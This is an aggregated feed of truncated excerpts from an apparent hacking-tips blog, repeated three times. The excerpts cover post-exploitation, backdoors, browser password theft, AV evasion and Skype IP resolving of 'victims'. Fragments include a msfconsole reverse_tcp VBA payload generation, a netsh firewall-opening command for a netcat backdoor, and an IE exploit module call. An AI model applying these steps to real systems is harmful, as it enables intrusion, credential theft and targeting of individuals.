Article: Post exploitation using Nishang. - published about 11 years ago.
Content:
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.
This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more i...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-using-nishang.html
Article: Post exploitation & swaparoo backdoor. - published about 11 years ago.
Content:
Today we are going to create valid RDP user in victim pc using two method.
(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you ...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html
Article: How to get plain text source from shc compiled bash script? - published about 11 years ago.
Content:
Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.
First we see how to compiled bash script to binary?
wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz
tar -xvzf shc-3.8.7.tgz
cd ...
https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html
Article: Exploit Oracle Endeca Server with metasploit. - published about 11 years ago.
Content:
This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. T...
https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html
Article: Access backtrack from remote computer using ssh & vnc. - published about 11 years ago.
Content:
If you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.
How to configure ssh in Backtrack 5 r3?
(1)First we have to generate ssh key.So type following in terminal.
ssh-keygen
It will generate public/private rsa key pair.By default ...
https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html
Article: Exploit for IE 9 on Windows 7 SP1 - published about 11 years ago.
Content:
This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version 9.0.8112.16446
Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)
msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer
msf exploit(ms13_059_cflatmarkuppo...
https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html
Article: Extract & decrypt passwords from Firefox & Thunderbird. - published about 11 years ago.
Content:
Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.
Most of the morden browser save information in sqlite format. When ...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published about 11 years ago.
Content:
In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.
Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current u...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html
Article: Hack local network PC using windows theam file. - published about 11 years ago.
Content:
This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Scr...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html
Article: Exploit For All IE version(CVE-2013-3893). - published about 11 years ago.
Content:
Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893)
that has been exploited in the wild, which was initially discovered in
Japan. At the time of this writing there is still no patch available,
but there is still at least a temporary fix-it that you can apply from
Microsoft, which can be downloaded h...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html
Article: Schedule Task in windows after Exploitation. - published about 11 years ago.
Content:
Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put their method here.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html
Article: Get shell using Missing Autoruns. - published about 11 years ago.
Content:
In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.
(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will r...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html
Article: Fun with skype resolver - published about 11 years ago.
Content:
Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.
If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.
netstat -tupan | grep skype > n1
Now chat with your victim; as soon as you got reply use following com...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html
Article: How to detect Avast Antivirus remotely? - published about 11 years ago.
Content:
During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?
Original video is posted...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html
Article: Get shell Using Shellcode in Macro. - published about 11 years ago.
Content:
We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.
msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit
Now we have generated our shellcode. Now we will create macro.
(1)Ope...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html
Article: Backdoor using Netcat, cryptcat , ncat. - published about 11 years ago.
Content:
Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here. Also i assume that you have already open port 455 using following command.
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Attacker `s I.P : 192.168.56.1
Victim`s I.P. : 192.168.56.101
We wi...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html
Article: List of Differnet AV evasion Frameworks. - published about 11 years ago.
Content:
Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.
(1)Veil:-
Veil is python based tool which create ...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html
Article: Username Enumeration in Mutillidae using Burpe Intruder. - published almost 11 years ago.
Content:
Mutillidae is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.
Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.
In M...
https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html
Article: How to solve compile error in veil? - published almost 11 years ago.
Content:
As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.
pure windows/meterpreter/reverse_tcp stager, no shellcode
pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode...
https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html
Article: Broken Authentication & Session Management in Mutillidae - published almost 11 years ago.
Content:
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.
Authentication Bypass
Privilege Escalation
Username Enumeration
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use a...
https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html
Article: XPATH Injection Tutorial - published almost 11 years ago.
Content:
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.
We are gonna learn using simple example. Downloa...
https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html
Article: Creating custom username list & wordlist for bruteforciing. - published almost 11 years ago.
Content:
During brute-forcing every time you need custom password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration.
Creating custom username list:...
https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html
Article: Deliver powershell payload using macro. - published almost 11 years ago.
Content:
In past we saw method of direct shell code execution in Ms word or Excel using macro;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.
Advantages of this method:-
(1)Persistence
(2)Migration is not needed
(3)AV...
https://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html
Article: How to install and use Veil-Catapult in backtrack? - published over 10 years ago.
Content:
Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install ...
https://tipstrickshack.blogspot.com/2014/02/how-to-install-and-use-veil-catapult-in.html
Article: Post exploitation using Nishang. - published about 11 years ago.
Content:
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.
This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more i...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-using-nishang.html
Article: Post exploitation & swaparoo backdoor. - published about 11 years ago.
Content:
Today we are going to create valid RDP user in victim pc using two method.
(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you ...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html
Article: How to get plain text source from shc compiled bash script? - published about 11 years ago.
Content:
Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.
First we see how to compiled bash script to binary?
wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz
tar -xvzf shc-3.8.7.tgz
cd ...
https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html
Article: Exploit Oracle Endeca Server with metasploit. - published about 11 years ago.
Content:
This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. T...
https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html
Article: Access backtrack from remote computer using ssh & vnc. - published about 11 years ago.
Content:
If you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.
How to configure ssh in Backtrack 5 r3?
(1)First we have to generate ssh key.So type following in terminal.
ssh-keygen
It will generate public/private rsa key pair.By default ...
https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html
Article: Exploit for IE 9 on Windows 7 SP1 - published about 11 years ago.
Content:
This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version 9.0.8112.16446
Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)
msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer
msf exploit(ms13_059_cflatmarkuppo...
https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html
Article: Pentesting of coldfusion web-application. - published about 11 years ago.
Content:
ColdFusion is a commercial rapid web application development platform.
CFML = ColdFusion Markup Language
ColdFusion = Adobe’s product that handles CFML page/libs
– Runs on Windows, Solaris, HP/UX and Linux
– Apache, IIS, Jrun
Following modules are Available in metasploit for coldfusion.
msf > search coldfusion
auxiliary/gather/coldfusion_pwd_props...
https://tipstrickshack.blogspot.com/2013/09/pentesting-of-coldfusion-web-application.html
Article: Extract & decrypt passwords from Firefox & Thunderbird. - published about 11 years ago.
Content:
Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.
Most of the morden browser save information in sqlite format. When ...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published about 11 years ago.
Content:
In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.
Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current u...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html
Article: Hack local network PC using windows theam file. - published about 11 years ago.
Content:
This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Scr...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html
Article: Exploit For All IE version(CVE-2013-3893). - published about 11 years ago.
Content:
Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893)
that has been exploited in the wild, which was initially discovered in
Japan. At the time of this writing there is still no patch available,
but there is still at least a temporary fix-it that you can apply from
Microsoft, which can be downloaded h...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html
Article: Schedule Task in windows after Exploitation. - published about 11 years ago.
Content:
Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put their method here.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html
Article: Get shell using Missing Autoruns. - published about 11 years ago.
Content:
In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.
(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will r...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html
Article: Fun with skype resolver - published about 11 years ago.
Content:
Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.
If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.
netstat -tupan | grep skype > n1
Now chat with your victim; as soon as you got reply use following com...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html
Article: How to detect Avast Antivirus remotely? - published about 11 years ago.
Content:
During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?
Original video is posted...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html
Article: Get shell Using Shellcode in Macro. - published about 11 years ago.
Content:
We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.
msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit
Now we have generated our shellcode. Now we will create macro.
(1)Ope...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html
Article: Backdoor using Netcat, cryptcat , ncat. - published about 11 years ago.
Content:
Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here. Also i assume that you have already open port 455 using following command.
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Attacker `s I.P : 192.168.56.1
Victim`s I.P. : 192.168.56.101
We wi...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html
Article: List of Differnet AV evasion Frameworks. - published about 11 years ago.
Content:
Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.
(1)Veil:-
Veil is python based tool which create ...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html
Article: Username Enumeration in Mutillidae using Burpe Intruder. - published almost 11 years ago.
Content:
Mutillidae is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.
Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.
In M...
https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html
Article: How to solve compile error in veil? - published almost 11 years ago.
Content:
As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.
pure windows/meterpreter/reverse_tcp stager, no shellcode
pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode...
https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html
Article: Broken Authentication & Session Management in Mutillidae - published almost 11 years ago.
Content:
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.
Authentication Bypass
Privilege Escalation
Username Enumeration
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use a...
https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html
Article: XPATH Injection Tutorial - published almost 11 years ago.
Content:
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.
We are gonna learn using simple example. Downloa...
https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html
Article: Creating custom username list & wordlist for bruteforciing. - published almost 11 years ago.
Content:
During brute-forcing every time you need custom password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration.
Creating custom username list:...
https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html
Article: Deliver powershell payload using macro. - published almost 11 years ago.
Content:
In past we saw method of direct shell code execution in Ms word or Excel using macro;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.
Advantages of this method:-
(1)Persistence
(2)Migration is not needed
(3)AV...
https://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html
Article: How to install and use Veil-Catapult in backtrack? - published over 10 years ago.
Content:
Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install ...
https://tipstrickshack.blogspot.com/2014/02/how-to-install-and-use-veil-catapult-in.html
Article: Post exploitation using Nishang. - published about 11 years ago.
Content: Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more info...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-using-nishang.html
Article: Post exploitation & swaparoo backdoor. - published about 11 years ago.
Content: Today we are going to create valid RDP user in victim pc using two method.(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you hav...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html
Article: How to get plain text source from shc compiled bash script? - published about 11 years ago.
Content: Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.First we see how to compiled bash script to binary?wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgztar -xvzf shc-3.8.7.tgzcd shc-3.8.7make./shcYo...
https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html
Article: Exploit Oracle Endeca Server with metasploit. - published about 11 years ago.
Content: This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. Thi...
https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html
Article: Access backtrack from remote computer using ssh & vnc. - published about 11 years ago.
Content: If you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.How to configure ssh in Backtrack 5 r3?(1)First we have to generate ssh key.So type following in terminal.ssh-keygenIt will generate public/private rsa key pair.By default location o...
https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html
Article: Exploit for IE 9 on Windows 7 SP1 - published about 11 years ago.
Content: This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version 9.0.8112.16446TargetIE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)msf > use exploit/windows/browser/ms13_059_cflatmarkuppointermsf exploit(ms13_059_cflatmarkuppointer) &...
https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html
Article: Pentesting of coldfusion web-application. - published about 11 years ago.
Content: ColdFusion is a commercial rapid web application development platform.CFML = ColdFusion Markup LanguageColdFusion = Adobe’s product that handles CFML page/libs– Runs on Windows, Solaris, HP/UX and Linux– Apache, IIS, Jrun Following modules are Available in metasploit for coldfusion.msf > search coldfusionauxiliary/gather/coldfusion_pwd_props ...
https://tipstrickshack.blogspot.com/2013/09/pentesting-of-coldfusion-web-application.html
Article: Extract & decrypt passwords from Firefox & Thunderbird. - published about 11 years ago.
Content: Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.Most of the morden browser save information in sqlite format. When use...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published about 11 years ago.
Content: In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current user...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html
Article: Hack local network PC using windows theam file. - published about 11 years ago.
Content: This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Sa...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html
Article: Exploit For All IE version(CVE-2013-3893). - published about 11 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded he...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html
Article: Schedule Task in windows after Exploitation. - published about 11 years ago.
Content: Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put their method here.After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You ca...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html
Article: Get shell using Missing Autoruns. - published about 11 years ago.
Content: In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run ...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html
Article: Fun with skype resolver - published about 11 years ago.
Content: Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1Now chat with your victim; as soon as you got reply use following command.ne...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html
Article: How to detect Avast Antivirus remotely? - published about 11 years ago.
Content: During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?Original video is posted he...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html
Article: Get shell Using Shellcode in Macro. - published about 11 years ago.
Content: We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.msfconsoleuse payload/windows/meterpreter/reverse_tcpset LHOST 192.168.56.102set LPORT 443generate -t vbaexploit Now we have generated our shellcode. Now we will create macro.(1)Open any word or E...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html
Article: Backdoor using Netcat, cryptcat , ncat. - published about 11 years ago.
Content: Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here. Also i assume that you have already open port 455 using following command.netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALLAttacker `s I.P : 192.168.56.1Victim`s I.P. : 192.168.56.101We will talk about...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html
Article: List of Differnet AV evasion Frameworks. - published about 11 years ago.
Content: Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.(1)Veil:-Veil is python based tool which create FUD pa...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html
Article: Username Enumeration in Mutillidae using Burpe Intruder. - published almost 11 years ago.
Content: Mutillidae is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.In Mutill...
https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html
Article: How to solve compile error in veil? - published almost 11 years ago.
Content: As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.pure windows/meterpreter/reverse_tcp stager, no shellcodepure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcodeCompi...
https://tipstrickshack.blogspot.com/2013/11/how-to-solve-compile-error-in-veil.html
Article: Broken Authentication & Session Management in Mutillidae - published almost 11 years ago.
Content: Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.Authentication BypassPrivilege EscalationUsername EnumerationWe have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentic...
https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html
Article: XPATH Injection Tutorial - published almost 11 years ago.
Content: XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.We are gonna learn using simple example. Download co...
https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html
Article: Creating custom username list & wordlist for bruteforciing. - published almost 11 years ago.
Content: During brute-forcing every time you need custom password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration.Creating custom username list:-(1)...
https://tipstrickshack.blogspot.com/2013/12/creating-custom-username-list-wordlist.html
Article: Deliver powershell payload using macro. - published almost 11 years ago.
Content: In past we saw method of direct shell code execution in Ms word or Excel using macro;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.Advantages of this method:-(1)Persistence(2)Migration is not needed(3)AV bypass(1...
https://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html
Article: How to install and use Veil-Catapult in backtrack? - published over 10 years ago.
Content: Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install Ve...
https://tipstrickshack.blogspot.com/2014/02/how-to-install-and-use-veil-catapult-in.html